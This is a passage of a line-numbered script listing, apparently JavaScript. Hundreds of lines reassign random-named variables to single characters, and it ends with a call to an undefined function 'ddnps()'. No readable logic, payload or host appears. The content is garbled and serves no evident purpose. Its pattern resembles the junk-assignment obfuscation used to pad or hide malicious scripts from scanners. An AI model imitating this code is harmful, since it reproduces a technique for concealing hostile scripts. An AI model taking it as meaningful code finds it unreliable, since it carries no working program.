728 | oemawc = "t"; | |
729 | distnyndo = "U"; | |
730 | distnyndo = "O"; | |
731 | distnyndo = "K"; | |
732 | distnyndo = "C"; | |
733 | distnyndo = "P"; | |
734 | distnyndo = "y"; | |
735 | distnyndo = "N"; | |
736 | distnyndo = "c"; | |
737 | distnyndo = "k"; | |
738 | distnyndo = "j"; | |
739 | distnyndo = "l"; | |
740 | distnyndo = "p"; | |
741 | distnyndo = "B"; | |
742 | distnyndo = "u"; | |
743 | distnyndo = "A"; | |
744 | distnyndo = "g"; | |
745 | distnyndo = "F"; | |
746 | distnyndo = "d"; | |
747 | distnyndo = "V"; | |
748 | distnyndo = "D"; | |
749 | distnyndo = "A"; | |
750 | distnyndo = "Q"; | |
751 | distnyndo = "U"; | |
752 | distnyndo = "w"; | |
753 | distnyndo = "m"; | |
754 | distnyndo = "x"; | |
755 | distnyndo = "j"; | |
756 | distnyndo = "V"; | |
757 | distnyndo = "k"; | |
758 | distnyndo = "T"; | |
759 | distnyndo = "C"; | |
760 | distnyndo = "p"; | |
761 | distnyndo = "p"; | |
762 | distnyndo = "s"; | |
763 | distnyndo = "I"; | |
764 | distnyndo = "P"; | |
765 | bzehobo = "H"; | |
766 | bzehobo = "M"; | |
767 | bzehobo = "q"; | |
768 | bzehobo = "j"; | |
769 | bzehobo = "y"; | |
770 | bzehobo = "r"; | |
771 | bzehobo = "H"; | |
772 | bzehobo = "s"; | |
773 | bzehobo = "l"; | |
774 | bzehobo = "b"; | |
775 | bzehobo = "s"; | |
776 | bzehobo = "Y"; | |
777 | bzehobo = "F"; | |
778 | bzehobo = "r"; | |
779 | rfvqyyzwp = "g"; | |
780 | rfvqyyzwp = "N"; | |
781 | rfvqyyzwp = "x"; | |
782 | rfvqyyzwp = "t"; | |
783 | rfvqyyzwp = "b"; | |
784 | rfvqyyzwp = "u"; | |
785 | rfvqyyzwp = "B"; | |
786 | rfvqyyzwp = "W"; | |
787 | rfvqyyzwp = "I"; | |
788 | rfvqyyzwp = "c"; | |
789 | rfvqyyzwp = "O"; | |
790 | rfvqyyzwp = "P"; | |
791 | rfvqyyzwp = "X"; | |
792 | rfvqyyzwp = "k"; | |
793 | uqxpvknxt = "p"; | |
794 | uqxpvknxt = "N"; | |
795 | uqxpvknxt = "T"; | |
796 | uqxpvknxt = "k"; | |
797 | uqxpvknxt = "s"; | |
798 | uqxpvknxt = "Z"; | |
799 | uqxpvknxt = "O"; | |
800 | uqxpvknxt = "m"; | |
801 | uqxpvknxt = "R"; | |
802 | uqxpvknxt = "M"; | |
803 | uqxpvknxt = "M"; | |
804 | uqxpvknxt = "G"; | |
805 | uqxpvknxt = "M"; | |
806 | uqxpvknxt = "y"; | |
807 | uqxpvknxt = "t"; | |
808 | uqxpvknxt = "U"; | |
809 | uqxpvknxt = "N"; | |
810 | uqxpvknxt = "b"; | |
811 | uqxpvknxt = "X"; | |
812 | uqxpvknxt = "O"; | |
813 | uqxpvknxt = "l"; | |
814 | uqxpvknxt = "k"; | |
815 | uqxpvknxt = "U"; | |
816 | uqxpvknxt = "g"; | |
817 | uqxpvknxt = "J"; | |
818 | uqxpvknxt = "e"; | |
819 | uqxpvknxt = "4"; | |
820 | xvscpt = "C"; | |
821 | xvscpt = "K"; | |
822 | xvscpt = "l"; | |
823 | xvscpt = "p"; | |
824 | xvscpt = "Z"; | |
825 | xvscpt = "h"; | |
826 | xvscpt = "1"; | |
827 | nbwakkcpi = "b"; | |
828 | nbwakkcpi = "A"; | |
829 | nbwakkcpi = "Q"; | |
830 | nbwakkcpi = "P"; | |
831 | nbwakkcpi = "B"; | |
832 | nbwakkcpi = "c"; | |
833 | nbwakkcpi = "A"; | |
834 | nbwakkcpi = "C"; | |
835 | nbwakkcpi = "D"; | |
836 | nbwakkcpi = "b"; | |
837 | nbwakkcpi = "h"; | |
838 | nbwakkcpi = "J"; | |
839 | nbwakkcpi = "L"; | |
840 | nbwakkcpi = "m"; | |
841 | nbwakkcpi = "S"; | |
842 | nbwakkcpi = "n"; | |
843 | nbwakkcpi = "c"; | |
844 | nbwakkcpi = "H"; | |
845 | nbwakkcpi = "f"; | |
846 | nbwakkcpi = "h"; | |
847 | ixkdq = "z"; | |
848 | ixkdq = "X"; | |
849 | ixkdq = "M"; | |
850 | ixkdq = "g"; | |
851 | ixkdq = "r"; | |
852 | ixkdq = "I"; | |
853 | ixkdq = "p"; | |
854 | ixkdq = "L"; | |
855 | ixkdq = "S"; | |
856 | ixkdq = "Z"; | |
857 | ixkdq = "g"; | |
858 | ixkdq = "R"; | |
859 | ixkdq = "K"; | |
860 | ixkdq = "h"; | |
861 | ixkdq = "w"; | |
862 | ixkdq = "Y"; | |
863 | ixkdq = "y"; | |
864 | ixkdq = "k"; | |
865 | ixkdq = "i"; | |
866 | ixkdq = "x"; | |
867 | ixkdq = "t"; | |
868 | ixkdq = "J"; | |
869 | ixkdq = "h"; | |
870 | ixkdq = "T"; | |
871 | ixkdq = "w"; | |
872 | ixkdq = "i"; | |
873 | ixkdq = "G"; | |
874 | ixkdq = "D"; | |
875 | ixkdq = "R"; | |
876 | ixkdq = "R"; | |
877 | ixkdq = "p"; | |
878 | ixkdq = "a"; | |
879 | ixkdq = "G"; | |
880 | ixkdq = "j"; | |
881 | ixkdq = "r"; | |
882 | ixkdq = "A"; | |
883 | ixkdq = "E"; | |
884 | ixkdq = "d"; | |
885 | ixkdq = "@"; | |
886 | gvzrcxf = "p"; | |
887 | gvzrcxf = " "; | |
888 | nigjlyv = "K"; | |
889 | nigjlyv = "J"; | |
890 | nigjlyv = "t"; | |
891 | nigjlyv = "q"; | |
892 | nigjlyv = "H"; | |
893 | nigjlyv = "w"; | |
894 | nigjlyv = "Z"; | |
895 | nigjlyv = "U"; | |
896 | nigjlyv = "C"; | |
897 | nigjlyv = "e"; | |
898 | nigjlyv = "N"; | |
899 | nigjlyv = "y"; | |
900 | nigjlyv = "c"; | |
901 | nigjlyv = "I"; | |
902 | nigjlyv = "j"; | |
903 | nigjlyv = "S"; | |
904 | nigjlyv = "K"; | |
905 | nigjlyv = "G"; | |
906 | nigjlyv = "J"; | |
907 | nigjlyv = "M"; | |
908 | nigjlyv = "V"; | |
909 | nigjlyv = "o"; | |
910 | nigjlyv = "d"; | |
911 | lijqbzi = "G"; | |
912 | lijqbzi = "k"; | |
913 | lijqbzi = "y"; | |
914 | lijqbzi = "s"; | |
915 | lijqbzi = "C"; | |
916 | lijqbzi = "x"; | |
917 | lijqbzi = "L"; | |
918 | lijqbzi = "g"; | |
919 | lijqbzi = "e"; | |
920 | lijqbzi = "r"; | |
921 | lijqbzi = "M"; | |
922 | lijqbzi = "Q"; | |
923 | lijqbzi = "D"; | |
924 | lijqbzi = "o"; | |
925 | lijqbzi = "G"; | |
926 | lijqbzi = "U"; | |
927 | lijqbzi = "z"; | |
928 | lijqbzi = "u"; | |
929 | lijqbzi = "s"; | |
930 | lijqbzi = "C"; | |
931 | lijqbzi = "T"; | |
932 | lijqbzi = "T"; | |
933 | lijqbzi = "v"; | |
934 | lijqbzi = "J"; | |
935 | lijqbzi = "N"; | |
936 | lijqbzi = "N"; | |
937 | lijqbzi = "J"; | |
938 | lijqbzi = "K"; | |
939 | lijqbzi = "d"; | |
940 | lijqbzi = "N"; | |
941 | lijqbzi = "i"; | |
942 | lijqbzi = "o"; | |
943 | lijqbzi = "S"; | |
944 | lijqbzi = "E"; | |
945 | lijqbzi = "z"; | |
946 | lijqbzi = "O"; | |
947 | lijqbzi = "A"; | |
948 | lijqbzi = "Y"; | |
949 | ltvxhlvw = "q"; | |
950 | ltvxhlvw = "U"; | |
951 | ltvxhlvw = "f"; | |
952 | ltvxhlvw = "F"; | |
953 | ltvxhlvw = "C"; | |
954 | ltvxhlvw = "H"; | |
955 | ltvxhlvw = "F"; | |
956 | ltvxhlvw = "f"; | |
957 | ltvxhlvw = "s"; | |
958 | ltvxhlvw = "K"; | |
959 | ltvxhlvw = "t"; | |
960 | ltvxhlvw = "R"; | |
961 | ltvxhlvw = "x"; | |
962 | ltvxhlvw = "X"; | |
963 | ltvxhlvw = "a"; | |
964 | ltvxhlvw = "O"; | |
965 | ltvxhlvw = "/"; | |
966 | sfyvhdcgb = "p"; | |
967 | sfyvhdcgb = "M"; | |
968 | sfyvhdcgb = "k"; | |
969 | sfyvhdcgb = "K"; | |
970 | sfyvhdcgb = "g"; | |
971 | sfyvhdcgb = "u"; | |
972 | sfyvhdcgb = "S"; | |
973 | sfyvhdcgb = "d"; | |
974 | sfyvhdcgb = "v"; | |
975 | sfyvhdcgb = "I"; | |
976 | lvmnwzyd = "O"; | |
977 | lvmnwzyd = "x"; | |
978 | lvmnwzyd = "J"; | |
979 | lvmnwzyd = "V"; | |
980 | lvmnwzyd = "k"; | |
981 | lvmnwzyd = "v"; | |
982 | lvmnwzyd = "i"; | |
983 | lvmnwzyd = "t"; | |
984 | lvmnwzyd = "T"; | |
985 | lvmnwzyd = "L"; | |
986 | lvmnwzyd = "d"; | |
987 | lvmnwzyd = "c"; | |
988 | lvmnwzyd = "f"; | |
989 | lvmnwzyd = "U"; | |
990 | lvmnwzyd = "f"; | |
991 | lvmnwzyd = "d"; | |
992 | lvmnwzyd = "Q"; | |
993 | lvmnwzyd = "g"; | |
994 | lvmnwzyd = "J"; | |
995 | lvmnwzyd = "S"; | |
996 | lvmnwzyd = "j"; | |
997 | lvmnwzyd = "U"; | |
998 | lvmnwzyd = "z"; | |
999 | lvmnwzyd = "w"; | |
1000 | lvmnwzyd = "n"; | |
1001 | lvmnwzyd = "n"; | |
1002 | lvmnwzyd = "x"; | |
1003 | lvmnwzyd = "a"; | |
1004 | lvmnwzyd = "I"; | |
1005 | lvmnwzyd = "w"; | |
1006 | lvmnwzyd = "l"; | |
1007 | lvmnwzyd = "N"; | |
1008 | lvmnwzyd = "T"; | |
1009 | lvmnwzyd = "t"; | |
1010 | lvmnwzyd = "a"; | |
1011 | lvmnwzyd = "3"; | |
1012 | ulijfbxcd = "V"; | |
1013 | ulijfbxcd = "e"; | |
1014 | ulijfbxcd = "X"; | |
1015 | ulijfbxcd = "T"; | |
1016 | ulijfbxcd = "W"; | |
1017 | ulijfbxcd = "q"; | |
1018 | ulijfbxcd = "n"; | |
1019 | ulijfbxcd = "x"; | |
1020 | ulijfbxcd = "e"; | |
1021 | ulijfbxcd = "T"; | |
1022 | ulijfbxcd = "b"; | |
1023 | ulijfbxcd = "O"; | |
1024 | ulijfbxcd = "U"; | |
1025 | ulijfbxcd = "L"; | |
1026 | ulijfbxcd = "J"; | |
1027 | ulijfbxcd = "n"; | |
1028 | ulijfbxcd = "W"; | |
1029 | ulijfbxcd = "i"; | |
1030 | ulijfbxcd = "s"; | |
1031 | ulijfbxcd = "A"; | |
1032 | ulijfbxcd = "p"; | |
1033 | ulijfbxcd = "B"; | |
1034 | ulijfbxcd = "W"; | |
1035 | ulijfbxcd = "O"; | |
1036 | ulijfbxcd = "w"; | |
1037 | ulijfbxcd = "N"; | |
1038 | ulijfbxcd = "u"; | |
1039 | ulijfbxcd = "9"; | |
1040 | xbfpx = "l"; | |
1041 | ffohk = "S"; | |
1042 | ffohk = "z"; | |
1043 | ffohk = "a"; | |
1044 | ffohk = "t"; | |
1045 | ffohk = "X"; | |
1046 | ffohk = "N"; | |
1047 | ffohk = "L"; | |
1048 | ffohk = "v"; | |
1049 | ffohk = "h"; | |
1050 | ffohk = "T"; | |
1051 | ffohk = "L"; | |
1052 | ffohk = "P"; | |
1053 | ffohk = "S"; | |
1054 | ffohk = "m"; | |
1055 | ffohk = "b"; | |
1056 | hqolnabr = "g"; | |
1057 | hqolnabr = "Z"; | |
1058 | hqolnabr = "F"; | |
1059 | hqolnabr = "o"; | |
1060 | hqolnabr = "D"; | |
1061 | hqolnabr = "P"; | |
1062 | hqolnabr = "N"; | |
1063 | hqolnabr = "h"; | |
1064 | hqolnabr = "o"; | |
1065 | hqolnabr = "L"; | |
1066 | hqolnabr = "Z"; | |
1067 | hqolnabr = "n"; | |
1068 | hqolnabr = "t"; | |
1069 | hqolnabr = "%"; | |
1070 | dekorutvr = "H"; | |
1071 | dekorutvr = "B"; | |
1072 | dekorutvr = "C"; | |
1073 | dekorutvr = "q"; | |
1074 | dekorutvr = "b"; | |
1075 | dekorutvr = "h"; | |
1076 | dekorutvr = "f"; | |
1077 | dekorutvr = "E"; | |
1078 | dekorutvr = "w"; | |
1079 | dekorutvr = "H"; | |
1080 | dekorutvr = "L"; | |
1081 | dekorutvr = "o"; | |
1082 | dekorutvr = "K"; | |
1083 | dekorutvr = "j"; | |
1084 | rwdjerwu = "F"; | |
1085 | rwdjerwu = "T"; | |
1086 | rwdjerwu = "z"; | |
1087 | rwdjerwu = "k"; | |
1088 | rwdjerwu = "i"; | |
1089 | rwdjerwu = "M"; | |
1090 | rwdjerwu = "j"; | |
1091 | rwdjerwu = "H"; | |
1092 | rwdjerwu = "I"; | |
1093 | rwdjerwu = "t"; | |
1094 | rwdjerwu = "E"; | |
1095 | rwdjerwu = "q"; | |
1096 | rwdjerwu = "u"; | |
1097 | rwdjerwu = "O"; | |
1098 | rwdjerwu = "u"; | |
1099 | rwdjerwu = "_"; | |
1100 | tjprhce = "Q"; | |
1101 | tjprhce = "v"; | |
1102 | tjprhce = "l"; | |
1103 | tjprhce = "I"; | |
1104 | tjprhce = "G"; | |
1105 | tjprhce = "y"; | |
1106 | tjprhce = "q"; | |
1107 | tjprhce = "h"; | |
1108 | tjprhce = "w"; | |
1109 | tjprhce = "I"; | |
1110 | tjprhce = "I"; | |
1111 | tjprhce = "S"; | |
1112 | tjprhce = "o"; | |
1113 | tjprhce = "i"; | |
1114 | tjprhce = "d"; | |
1115 | tjprhce = "Y"; | |
1116 | tjprhce = "z"; | |
1117 | tjprhce = "p"; | |
1118 | tjprhce = "K"; | |
1119 | vkqiqq = "K"; | |
1120 | vkqiqq = "m"; | |
1121 | czomrlybj = "J"; | |
1122 | czomrlybj = "M"; | |
1123 | czomrlybj = "a"; | |
1124 | czomrlybj = "F"; | |
1125 | czomrlybj = "x"; | |
1126 | czomrlybj = "I"; | |
1127 | czomrlybj = "M"; | |
1128 | czomrlybj = "C"; | |
1129 | czomrlybj = "G"; | |
1130 | czomrlybj = "i"; | |
1131 | czomrlybj = "B"; | |
1132 | czomrlybj = "P"; | |
1133 | czomrlybj = "X"; | |
1134 | czomrlybj = "c"; | |
1135 | czomrlybj = "o"; | |
1136 | czomrlybj = "y"; | |
1137 | czomrlybj = "c"; | |
1138 | czomrlybj = "U"; | |
1139 | czomrlybj = "k"; | |
1140 | czomrlybj = "V"; | |
1141 | czomrlybj = "M"; | |
1142 | czomrlybj = "g"; | |
1143 | czomrlybj = "V"; | |
1144 | czomrlybj = "j"; | |
1145 | czomrlybj = "w"; | |
1146 | czomrlybj = "E"; | |
1147 | czomrlybj = "n"; | |
1148 | czomrlybj = "D"; | |
1149 | czomrlybj = "Q"; | |
1150 | czomrlybj = "E"; | |
1151 | czomrlybj = "p"; | |
1152 | czomrlybj = "M"; | |
1153 | czomrlybj = "a"; | |
1154 | czomrlybj = "V"; | |
1155 | czomrlybj = "H"; | |
1156 | czomrlybj = "y"; | |
1157 | czomrlybj = "X"; | |
1158 | czomrlybj = "n"; | |
1159 | czomrlybj = "R"; | |
1160 | ddnps ( ); |
|